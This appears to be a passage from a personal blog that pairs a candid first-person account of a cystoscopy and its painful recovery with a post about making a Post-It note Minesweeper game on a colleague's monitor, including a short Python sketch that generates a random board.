A graphing printer describes Dan Q's urine flow. The 'flow rate' graph shows an initial peak, then a trough, then continues to a higher sustained peak.
Apparently not all men experience that ‘spurt-and-then-full-pressure’ thing you’ll see on the graph on the right, when they start to pee, but some of us do, and it’s perfectly normal. I’m learning so much!

Finally came the cystoscopy, and this was the bit that I’d been most-nervous about. This procedure involves the insertion of a long flexible tube into the urethra at the tip of the penis, under local anaesthetic, and pushing it all the way down, through the sphincter, down through the prostate and then back up into the bladder. It’s then used as a channel to pump water into the bladder, filling it to capacity and stretching out the sides, after which the fibreoptic cord (and light) that runs along its length is used to look around inside the bladder to inspect for any of a plethora of different problems.

Cystoscopy equipment, ready for insertion.
You’re going to put that WHERE?

The doctor invited me to watch with him on the monitor, which I initially assumed was because I was clearly interested in everything and kept asking questions, but in hindsight I wonder if it’s just that he – quite rightly – assumed that I might have panicked if I’d been looking in the direction of the piece of equipment he brought in and jabbed at my penis with. I only looked at it while it was on its way out, and my god it’s a scary-looking thing: sort of like a cross between a tyre pressure gauge and a blowtorch. The first few inches were painless – the local anaesthetic had made me completely numb right up to and including the external sphincter, which is at the base of the penis. However, what I can only assume was the second sphincter complained of the discomfort, and it stung pretty sharply any time the doctor would twist the cystoscope to change the angle of the picture.

View up a urethra, from a cystoscope.
The view as you ‘travel’ up the urethra looks pretty much like I expected. With a motion simulator, it would make a pretty cool ride!

Seeing the inside of your own body is an amazing experience. I mean: it’s not amazing enough to even be worth the experience of a cystoscopy, never mind the illness that in my case preceded it… but it’s still pretty cool. The ultrasounds were interesting, but there’s nothing quite so immersive as seeing a picture of the inside of your own bladder, gritting your teeth while the doctor points to an indentation and explains that it’s the opening to the ureter that connects to your own left kidney!

Unfortunately I neglected to take my phone into the operating room, having put it into a locker when I changed into a gown, and so I wasn’t able to (as I’d hoped) take photos of the inside of my own bladder. So you’ll have to make do with this video I found, which approximates the experience pretty well. The good news is that there’s probably nothing wrong with me, now that the infection from earlier this year has passed: nothing to suggest that there’s any deeper underlying issue that caused me to get sick, anyway!

The bad news is that while the procedure itself was shorter and more-bearable than I’d expected, the recovery’s been a real drag. A week later, it still hurts a lot to urinate (although I’ve stopped yelping out loud when I do so) and my crotch is still too sore for me to be able to cycle. I’ve also discovered that an erection can be painful enough to wake me up, which is definitely not the most-pleasant way I’ve been roused by a penis. But it’s getting better, day by day, and at least I know for sure that I’m more-or-less “right” in the renal system, now.


Post-It Minesweeper

Remember Minesweeper? It’s probably been forever since you played, so go have a game online now. And there went your afternoon.

A game of Microsoft Minesweeper in progress.
This is actually a pretty tough move.

My geek-crush Ben Foxall posted on Twitter on Monday morning to share that he’d had a moment of fun nostalgia when he’d come into the office to discover that somebody in his team had covered his monitor with two layers of Post-It notes. The bottom layer contained numbers – and bombs! – to represent the result of a Minesweeper board, and the upper layer ‘covered’ them so that individual Post-Its could be removed to reveal what lay beneath. Awesome.

Ben Foxall discovers Post-It Minesweeper
Unlike most computerised implementations of Minesweeper, the first move isn’t guaranteed to be safe. Tread carefully…

Not to be outdone, I hunted around my office and found some mini-Post-Its. Being smaller meant that I could fit more of them onto a monitor and thus make a more-sophisticated (and more-challenging!) play space. But how to generate the board? Sure: I could do it by hand, but that doesn’t seem very elegant at all – plus, humans make really bad random number generators! I didn’t need quantum-tunnelling-seeded Minesweeper (yes, that’s a thing) levels of entropy, sure, but it’d still be nice to outsource the heavy lifting to a computer, right?

Screenshot of my Post-It Minesweeper board generator.
Yes, I’m quite aware of the irony of using a computer to generate a paper-based version of a computer game, why do you ask?

So naturally, I wrote a program to do it for me. Want to see? It’s at danq.me/minesweeper. Just line up some Post-Its on a co-worker’s monitor to work out how many you can fit across it in each dimension (I found that I could get 6 × 4 standard-sized Post-Its but 7 × 5 or even 8 × 5 mini-sized Post-Its very comfortably onto one of the typical widescreen monitors in my office), decide how many mines you want, and click Generate. Don’t like the board you get? Click it again!
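If you’d rather roll your own, the algorithm couldn’t be much simpler. Here’s a rough sketch in Python – to be clear, this isn’t the code behind danq.me/minesweeper, just an illustration of the idea; the function name and the 7 × 5, 6-mine example are my own:

import random

def generate_board(width, height, mines):
    # Pick unique cell indices to be mines, then map them to (x, y) positions
    mined = {(i % width, i // width)
             for i in random.sample(range(width * height), mines)}
    rows = []
    for y in range(height):
        row = []
        for x in range(width):
            if (x, y) in mined:
                row.append('*')
            else:
                # Count mines among the (up to) eight neighbouring cells
                row.append(str(sum((nx, ny) in mined
                                   for nx in (x - 1, x, x + 1)
                                   for ny in (y - 1, y, y + 1))))
        rows.append(' '.join(row))
    return '\n'.join(rows)

# A 7 × 5 grid of mini Post-Its with 6 mines:
print(generate_board(7, 5, 6))

Each symbol in the output corresponds to one Post-It on the bottom layer; cover the lot with a second layer and you’re ready to play.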

Liz McCarthy tweets about her experience of being given a Post-It Minesweeper game to play.
I set up the first game on my colleague Liz’s computer, before she came in this morning.

And because I was looking for a fresh excuse to play with Periscope, I broadcast the first game I set up live to the Internet. In the end, 66 people ended up watching some or all of a paper-based game of Minesweeper played by my colleague Liz, including moments of cheering her on and, in one weird moment, despair at the revelation that she was married. The internet’s strange, yo.

Anyway: in case you missed the Periscope broadcast, I’ve put it on YouTube. Sorry about the portrait-orientation filming: I think it’s awful, too, but it’s a Periscope thing and I haven’t installed the new update that fixes it yet.

Now go set up a game of Post-It Minesweeper for a friend or co-worker.
